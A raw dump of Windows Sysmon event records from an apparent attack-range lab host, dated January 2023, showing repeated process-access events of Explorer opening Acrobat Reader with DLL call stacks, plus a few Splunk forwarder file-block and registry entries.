DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c3d3|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x800000000000000047051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.329{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.329{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.329{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.329{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.329{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.328{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.328{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.328{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.328{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.328{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.327{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.327{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 23542300x800000000000000047039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.290{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8887CBD2DDEBBE1A02F47B3D2B78F16,SHA256=E4663BCA1AB00568539B51FB026736CA8E682D2CBA46045C65E94BB1F282DE48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000047038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:30:11.281{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{21F5E992-636E-48DC-9C47-5B05DEF82372} {E357FCCD-A995-4576-B01F-234630154E96} 0xFFFFBinary Data 23542300x800000000000000047037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.271{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36B2495463042CE9926B656F7719C823,SHA256=1EC794E3AB7B047A3E452A49ECFC0A7BFC2E2E4792B46D5983309701A4F19AA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.268{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FB0F985F86C28188BDB421E42F8F4B5,SHA256=4B2AA0975CCF302BA07FDA61805CFED6DCC58CE0CD7088DD788BDFA6F6DCD9CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.251{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.251{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.242{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005188C:\Windows\Explorer.EXE{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader 